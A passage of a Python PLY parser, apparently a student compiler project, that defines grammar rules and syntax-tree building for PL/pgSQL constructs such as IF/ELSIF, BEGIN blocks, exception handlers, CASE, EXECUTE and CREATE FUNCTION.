ELSIF condition THEN if_inst '''\n\n\n if len(t) == 6:\n childsProduction = addNotNoneChild(t,[3])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n lista2 = None\n if t[5] != None:\n lista2 = t[5][0]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"elsif_opt\"), [lista, t[2], t[3], t[4], lista2],childsProduction )\n addCad(\"**\\** ::= \\ tElsIf \\ tThen \\ \")\n t[0] = IfNode(t[3], t[5], None, None, t.slice[2].lineno, t.slice[2].lexpos, graph_ref)\n \n\ndef p_elsif_opt0(t):\n '''elsif_opt : empty '''\n t[0] = None\n #print(t)\n\n\n\n\ndef p_else_opt(t):\n '''else_opt : ELSE if_inst '''\n\n\n if len(t) == 3: \n lista = None\n childsProduction = []\n if t[2] != None:\n lista = t[2][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"else_opt\"), [t[1], lista], childsProduction )\n addCad(\"**\\** ::= tElse \\ \")\n t[0] = ElseNode(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n \n\ndef p_else_opt0(t):\n '''else_opt : empty '''\n t[0] = None\n #print(t)\n\n\n\n\n\n\n#TODO @ESTEBAN produccion 4 y 5\ndef p_if_inst(t):\n '''if_inst : if_inst statements_sql PUNTOCOMA\n | if_inst raise_op\n | if_inst asig_basica PUNTOCOMA\n | if_inst return_ PUNTOCOMA\n | if_inst stm_if PUNTOCOMA\n '''\n graph_ref = ''\n token = t.slice[2]\n if token.type == \"statements_sql\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n t[0] = [upNodo(\"token\", 0, 0, graph_ref)]\n #print(t)\n elif token.type == \"raise_op\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ \")\n t[0] = [upNodo(\"token\", 0, 0, graph_ref)]\n #print(t)\n elif token.type == \"asig_basica\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ \\ ';' \")\n ############\n elif token.type == \"return_\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n elif token.type == \"stm_if\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \") \n\n \n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n\n\n\n\ndef p_if_inst0(t):\n '''if_inst : empty '''\n\n t[0]= None\n\n\n# TODO @ESTEBAN tener en cuenta que el return esta como None\ndef p_stm_begin(t):\n '''stm_begin : declares_opt BEGIN statements_begin exception_opt return_opt END if_opt '''\n lista = None\n childsProduction = addNotNoneChild(t,[4,5,7])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n ret = t[5]\n lista2 = None\n if t[3] != None:\n lista2 = t[3][0]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"stm_begin\"), [lista, t[2], lista2, t[4], t[5],t[6] ,t[7]],childsProduction )\n addCad(\"**\\** ::= [\\] tBegin \\ [\\] [\\] tEnd [\\] \")\n t[0] = FunctionBody(t[1], t[3], t[4], ret, t.slice[2].lineno, t.slice[2].lexpos, graph_ref)\n\n\n\ndef p_statements_begin(t):\n '''statements_begin : statements_begin statements_sql PUNTOCOMA\n | statements_begin stm_if PUNTOCOMA \n | statements_begin asig_basica PUNTOCOMA\n | statements_begin stm_case PUNTOCOMA \n | statements_begin return_ PUNTOCOMA ''' \n token = t.slice[2]\n if token.type == \"statements_sql\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1]\n \n elif token.type == \"stm_if\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \") \n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1]\n\n elif token.type == \"asig_basica\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n elif token.type == \"stm_case\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1]\n elif token.type == \"return_\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n \n\n\n \n\ndef p_statements_begin0(t):\n '''statements_begin : empty '''\n t[0]= None\n\n\ndef p_return_(t):\n '''return_ : RETURN logicExpression '''\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"return_\"), [t[1], t[2]], childsProduction )\n addCad(\"**\\** ::= tReturn \\ \")\n t[0] = Return(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_exception_opt(t):\n '''exception_opt : EXCEPTION when_opt '''\n\n\n if len(t) == 3:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"exception_opt\"), [t[1], t[2]],childsProduction )\n addCad(\"**\\** ::= tException [\\] \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\ndef p_exception_opt1(t):\n '''exception_opt : empty '''\n t[0] =None\n\n\ndef p_when_opt(t):\n '''when_opt : when_opt WHEN atr_when then_op\n | WHEN atr_when then_op\n | WHEN '''\n \n token = t.slice[1]\n if len(t) == 5:\n childsProduction = addNotNoneChild(t,[1,3,4])\n graph_ref = graph_node(str(\"when_opt\"), [t[1], t[2],t[3],t[4]],childsProduction )\n addCad(\"**\\** ::= \\ tWhen \\ [\\] \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 4:\n childsProduction = addNotNoneChild(t,[2,3])\n graph_ref = graph_node(str(\"when_opt\"), [t[1], t[2],t[3]],childsProduction )\n addCad(\"**\\** ::= tWhen \\ [\\] \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"WHEN\" and len(t)==2:\n graph_ref = graph_node(str(\"when_opt\"), [t[1]],[] )\n addCad(\"**\\** ::= tWhen \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\ndef p_when_opt0(t):\n '''when_opt : empty '''\n t[0]= None\n\n\ndef p_atr_when(t):\n '''atr_when : NO_DATA_FOUND\n | TOO_MANY_ROWS\n | ID '''\n token = t.slice[1]\n if token.type == \"NO_DATA_FOUND\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tNo_data_found \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"TOO_MANY_ROWS\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tToo_many_rows \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"ID\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\ndef p_then_op(t):\n ''' then_op : THEN raise_op \n '''\n if len(t) == 3:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"then_op\"), [t[1],t[2]], childsProduction )\n addCad(\"**\\** ::= tTHEN \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\n\ndef p_then_op1(t):\n ''' then_op : THEN NULL PUNTOCOMA\n '''\n\n\n if len(t) == 4:\n graph_ref = graph_node(str(\"then_op\"), [t[1],t[2],t[3]], [] )\n addCad(\"**\\** ::= tThen tNull \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\ndef p_raise_op(t):\n ''' raise_op : RAISE atr_raise TEXTO COMA col_name PUNTOCOMA\n | RAISE atr_raise TEXTO PUNTOCOMA'''\n\n token = t.slice[1]\n if len(t) == 7:\n childsProduction = addNotNoneChild(t,[2,5])\n graph_ref = graph_node(str(\"raise_op\"), [t[1],t[2],t[3],t[4],t[5],t[6]], childsProduction )\n addCad(\"**\\** ::= tRaise \\ tTexto ',' \\ ';' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 5:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"raise_op\"), [t[1],t[2],t[3],t[4]], childsProduction )\n addCad(\"**\\** ::= tRaise \\ tTexto ';' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\ndef p_raise_op1(t):\n ''' raise_op : empty '''\n t[0] = None\n #print(t)\n\n\n\ndef p_atr_raise(t):\n '''atr_raise : NOTICE\n | EXCEPTION\n | ID '''\n\n token = t.slice[1]\n if token.type == \"NOTICE\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tNotice \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"TOO_MANY_ROWS\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tException \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"ID\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\n\n\ndef p_return_opt(t):\n '''return_opt : RETURN logicExpression PUNTOCOMA '''\n\n\n if len(t) == 4:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"return_opt\"), [t[1], t[2], t[3]], childsProduction )\n addCad(\"**\\** ::= tReturn \\ ';' \")\n t[0] = Return(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #print(t)\n\n\ndef p_return_opt0(t):\n '''return_opt : empty '''\n t[0]=None\n\n\n\n\n\ndef p_stm_execute(t):\n '''stm_execute : EXECUTE TEXTO INTO ID USING group_list \n | EXECUTE ID PARA TEXTO COMA column_list PARC INTO ID USING group_list\n | EXECUTE ID PARA TEXTO TEXTO COMA column_list PARC INTO ID USING group_list\n | EXECUTE ID PARA TEXTO COMA column_list PARC USING group_list\n | EXECUTE ID PARA TEXTO TEXTO COMA column_list PARC USING group_list \n | EXECUTE ID PARA TEXTO COMA column_list PARC \n | EXECUTE expression\n | EXECUTE ID PARA exp_list PARC\n | EXECUTE ID PARA PARC\n '''\n\n token = t.slice[1]\n if len(t) == 7:\n childsProduction = addNotNoneChild(t,[6])\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],t[6]],childsProduction )\n addCad(\"**\\** ::= tExecute TEXTO tInto tIdentifier tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 12:\n childsProduction = addNotNoneChild(t,[11])\n lista = None\n if t[6] != None:\n lista = t[6][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],lista,t[7],t[8],t[9],t[10],t[11]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO ‘,’ \\ ’)’ tInto tIdentifier tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 13:\n childsProduction = addNotNoneChild(t,[12])\n lista = None\n if t[7] != None:\n lista = t[7][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],t[6],lista,t[8],t[9],t[10],t[11],t[12]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO TEXTO ‘,’ \\ ’)’ tInto tIdentifier tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 10:\n childsProduction = addNotNoneChild(t,[9])\n lista = None\n if t[6] != None:\n lista = t[6][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],lista,t[7],t[8],t[9]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO ‘,’ \\ ’)’ tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 11:\n childsProduction = addNotNoneChild(t,[10])\n lista = None\n if t[7] != None:\n lista = t[7][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],t[6],lista,t[8],t[9],t[10]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO TEXTO ‘,’ \\ ’)’ tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 8:\n childsProduction = []\n lista = None\n if t[6] != None:\n lista = t[6][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],lista,t[7]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO ‘,’ \\ ’)’ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 3:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2]],childsProduction )\n addCad(\"**\\** ::= tExecute \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif len(t) == 6:\n childsProduction = addNotNoneChild(t,[4])\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2], t[3], t[5]]) \n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ \\ ‘)’ \")\n t[0] = FuncCall(t[2], t[4], SymbolType.STOREPROCEDURE, t.slice[1].lineno, t.slice[1].lexpos)\n elif len(t) == 5: \n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2] ,t[3], t[4]])\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ ‘)’ \")\n t[0] = FuncCall(t[2], None, SymbolType.STOREPROCEDURE, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_stm_get(t):\n '''stm_get : GET DIAGNOSTICS asig_basica \n '''\n\n token = t.slice[1]\n if len(t) == 4:\n childsProduction = addNotNoneChild(t,[3])\n graph_ref = graph_node(str(\"STM_GET\"), [t[1], t[2],t[3]],childsProduction )\n addCad(\"**\\** ::= tGet tDiagnostics \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\n\n\n\n\ndef p_stm_case(t):\n '''stm_case : CASE id_case WHEN condition THEN case_inst when_inst case_else END CASE '''\n token = t.slice[1]\n if len(t) == 11:\n childsProduction = addNotNoneChild(t,[4,7,8])\n lista = None\n if t[2] != None:\n lista = t[2][0]\n childsProduction.append(lista.graph_ref) \n lista2 = None\n if t[6] != None:\n lista2 = t[6][0]\n childsProduction.append(lista2.graph_ref) \n graph_ref = graph_node(str(\"stm_case\"), [t[1], lista,t[3],t[4],t[5],lista2,t[7],t[8],t[9],t[10]],childsProduction )\n addCad(\"**\\** ::= tCase [\\] [\\] \\ tThen [\\] [\\] tEnd tCase \")\n t[0] = CaseNode(t[4], t[6], t[7], t[8], t.slice[1].lineno, t.slice[1].lexpos,graph_ref)\n\ndef p_id_case(t):\n '''id_case : column_list\n | empty '''\n \n token = t.slice[1]\n if token.type == \"column_list\":\n addCad(\"**\\** ::= \\ \")\n t[0]=t[1]\n else:\n t[0] = None\n #print(t)\n\n\ndef p_when_inst(t):\n '''when_inst : when_inst WHEN condition THEN case_inst\n | WHEN condition THEN case_inst '''\n \n if len(t) == 6:\n childsProduction = addNotNoneChild(t,[1,3])\n \n lista = None\n if t[5] != None:\n lista = t[5][0]\n childsProduction.append(lista.graph_ref)\n \n graph_ref = graph_node(str(\"when_inst\"), [t[1], t[2],t[3],t[4],lista],childsProduction )\n addCad(\"**\\** ::= \\ tWhen \\ tThen \\ \")\n t[0] = CaseNode(t[3], t[5], None, None, t.slice[2].lineno, t.slice[2].lexpos,graph_ref)\n #t[0]= [upNodo(\"token\", 0, 0, graph_ref)]\n if len(t) == 5: \n childsProduction = addNotNoneChild(t,[2])\n \n lista = None\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref) \n graph_ref = graph_node(str(\"when_inst\"), [t[1], t[2],t[3],lista],childsProduction )\n addCad(\"**\\** ::= tWhen \\ tThen \\ \")\n t[0] = CaseNode(t[2], t[4], None, None, t.slice[1].lineno, t.slice[1].lexpos,graph_ref)\n #t[0]= [upNodo(\"token\", 0, 0, graph_ref)]\n \n\n\ndef p_case_else(t):\n '''case_else : ELSE case_inst\n '''\n \n token = t.slice[1]\n if len(t) == 3:\n childsProduction = []\n lista = None\n if t[2] != None:\n lista = t[2][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_else\"), [t[1], lista],childsProduction )\n addCad(\"**\\** ::= tElse \\ \")\n t[0] = ElseNode(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #print(t)\n\n\ndef p_case_inst(t):\n '''case_inst : case_inst statements_sql PUNTOCOMA\n | case_inst raise_op\n | case_inst asig_basica PUNTOCOMA\n | case_inst return_ PUNTOCOMA\n | case_inst stm_if PUNTOCOMA '''\n \n token = t.slice[2]\n if token.type == \"statements_sql\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= [\\] \\ ';' \")\n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n #print(t)\n elif token.type == \"raise_op\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= [\\] \\ \")\n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n #print(t)\n elif token.type == \"asig_basica\":\n childsProduction = addNotNoneChild(t,[1,2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= [\\] \\ ';' \") \n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n\n elif token.type == \"return_\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n\n elif token.type == \"stm_if\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \") \n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n\n\n\n\n\n \n\ndef p_case_inst0(t):\n '''case_inst : empty '''\n t[0] = None\n #print(t)\n\n\n\n\n\ndef p_statements_sql(t):\n '''statements_sql : stm_select\n | stm_insert\n | stm_update\n '''\n t[0]=t[1]\n\ndef p_if_opt(t):\n '''if_opt : IF\n | empty'''\n token = t.slice[1]\n if token.type == \"IF\":\n addCad(\"**\\** ::= tIf \")\n t[0] = t[1]\n else:\n t[0]=None\n\n########## >>>>>>>>>>>>>>>> CREATE FUNCTION <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_create_function(t):\n '''stm_create_function : CREATE FUNCTION ID PARA list_param_function_opt PARC RETURNS type as_opt stm_begin PUNTOCOMA DOLLAR DOLLAR LANGUAGE PLPGSQL'''\n childsProduction = addNotNoneChild(t,[8,9,10])\n #to graph list_param\n lista = None \n if t[5] != None:\n lista = t[5][0]\n childsProduction.append(lista.graph_ref) \n graph_ref = graph_node(str(\"stm_create_function\"), [t[1],t[2],t[3],t[4], lista,t[6],t[7],t[8],t[9],t[10], t[11], str(t[12]) + str(t[13]), t[14], t[15] ], childsProduction )\n addCad(\"**\\** ::= tCreate tFunction tIdentifier '(' [\\] ')' tReturns \\ [\\] \\ ';' '$$' tLanguage tPlpgsql\")\n t[0] = Function(t[3], t[5], t[8], t[10], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_list_param_function_opt(t):\n '''list_param_function_opt : params_function \n | empty'''\n token = t.slice[1] \n if token.type == \"params_function\":\n lista = None\n childsProduction = []\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref) \n graph_ref = graph_node(str(\"list_param_function_opt\"), [lista], childsProduction )\n addCad(\"**\\** ::= [\\] \")\n t[1][0].graph_ref = graph_ref\n t[0] = t[1]\n else:\n t[0]=None\n\n\ndef p_params_function(t):\n '''params_function : params_function COMA param_function\n | param_function'''\n token = t.slice[1]\n if token.type == \"params_function\":\n lista = None\n childsProduction = addNotNoneChild(t,[3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"params_function\"), [lista, t[2], t[3]] ,childsProduction )\n addCad(\"**\\** ::= \\ ',' \\ \")\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1] \n else:\n childsProduction = addNotNoneChild(t,[1])\n graph_ref = graph_node(str(\"params_function\"), [t[1]], childsProduction )\n addCad(\"**\\** ::= \\ \")\n t[1].graph_ref = graph_ref \n t[0] = [t[1]]\n\n\ndef p_param_function(t):\n '''param_function : ID\n | type'''\n token = t.slice[1]\n if token.type == \"ID\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIdentifier \")\n t[0] = Parameter(t[1], None, None, token.lineno, token.lexpos, graph_ref)\n \n else:\n childsProduction = addNotNoneChild(t,[1])\n graph_ref = graph_node(str(\"param_function\"), [t[1]], childsProduction )\n addCad(\"**\\** ::= \\ \")\n t[0] = Parameter(None, None, t[1], token.value.line, token.value.column, graph_ref)\n \n\n\ndef p_param_function_1(t):\n '''param_function : ID type\n | param_mode ID type'''\n token = t.slice[1]\n if token.type == \"ID\":\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"param_function \"), [t[1],t[2]], childsProduction )\n addCad(\"**\\** ::= tIdentifier \\\")\n t[0] = Parameter(t[1], None, t[2], token.lineno, token.lexpos, graph_ref)\n\n else:\n childsProduction = addNotNoneChild(t,[1,3])\n graph_ref = graph_node(str(\"param_function \"), [t[1], t[2], t[3]], childsProduction )\n addCad(\"**\\** ::= [\\]tIdentifier \\\")\n t[0] = Parameter(t[2], t[1], t[3], token.lineno, token.lexpos, graph_ref)\n\n\ndef p_param_mode(t):\n '''param_mode : IN\n | OUT\n | INOUT'''\n token = t.slice[1]\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= \"+ str(token.type))\n t[0] = ParamMode(t[1], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\n\n\ndef p_as_opt(t):\n '''as_opt : AS DOLLAR DOLLAR\n | empty'''\n if len(t) == 4:\n graph_ref = graph_node(str(\"as_opt\"), [t[1],t[2],t[3]], [] )\n addCad(\"**\\** ::= tAs '$$' ';' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #####\n else:\n t[0]=None\n\n\ndef p_declares_opt_0(t):\n '''declares_opt : declares_opt DECLARE declarations'''\n lista = None\n childsProduction = []\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n lista2 = None\n if t[3] != None:\n lista2 = t[3][0]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"declares_opt\"), [lista, t[2], lista2], childsProduction )\n addCad(\"**\\** ::= [\\] tDeclare \\ \")\n if t[1] != None:\n #t[1][0].graph_ref = graph_ref\n t[1].extend(t[3])\n t[1][0].graph_ref = graph_ref\n t[0] = t[1]\n else: \n t[3][0].graph_ref = graph_ref\n t[0] = t[3]\n #####\n\n \ndef p_declares_opt_1(t):\n '''declares_opt : empty'''\n t[0] = None\n\ndef p_declarations(t):\n '''declarations : declarations declaration\n | declaration'''\n token = t.slice[1]\n if token.type == \"declarations\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n \n graph_ref = graph_node(str(\"declarations\"), [lista,t[2]], childsProduction )\n addCad(\"**\\** ::= [\\] \\ \")\n t[1][0].graph_ref = graph_ref \n t[1].append(t[2])\n t[0] = t[1]\n #####\n else:\n addCad(\"**\\** ::= \\ \")\n t[0] = [t[1]]\n \ndef p_declaration(t):\n '''declaration : ID constant_opt type collate_opt not_null_opt expression_opt PUNTOCOMA \n | ID ALIAS FOR DOLLAR ENTERO PUNTOCOMA'''\n if len(t) == 8:\n childsProduction = addNotNoneChild(t,[2,3,4,5,6])\n graph_ref = graph_node(str(\"declaration\"), [t[1],t[2],t[3],t[4],t[5],t[6],t[7]], childsProduction )\n addCad(\"**\\** ::= tIdentifier \\ \\ \\ \\ \\ ';' \")\n t[0] = Declaration(t[1], t[2] is not None, t[3], True, t[6], None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n elif len(t) == 7:\n graph_ref = graph_node(str(\"declaration\"), [t[1],t[2],t[3],t[4],t[5],t[6]], [] )\n addCad(\"**\\** ::= tId tAlias tFor $ tEntero ';' \")\n t[0] = Declaration(t[1], False, None, True, None, t[5], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\ndef p_declaration_1(t):\n '''declaration : ID ID PORCENTAJE ROWTYPE PUNTOCOMA\n | ID ID PUNTO ID PORCENTAJE TYPE PUNTOCOMA\n | ID RECORD PUNTOCOMA'''\n if len(t) == 6:\n graph_ref = graph_node(str(\"declaration\"), [t[1], str(t[2]) + str(t[3]) +str(t[4]), t[5]], [] )\n addCad(\"**\\** ::= tIdentifier tIdentifier '%' tRowtype ';' \")\n t[0] = Declaration(t[1], False, t[4], True, None, None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref )\n elif len(t) == 8:\n graph_ref = graph_node(str(\"declaration\"), [t[1], str(t[2]) + str(t[3]) + str(t[4]) + str(t[5]) + str(t[6]), t[7]], [] )\n addCad(\"**\\** ::= tIdentifier tIdentifier tPunto '%' tType\")\n t[0] = Declaration(t[1], False, t[6], True, None, None, t.slice[1].lineno, 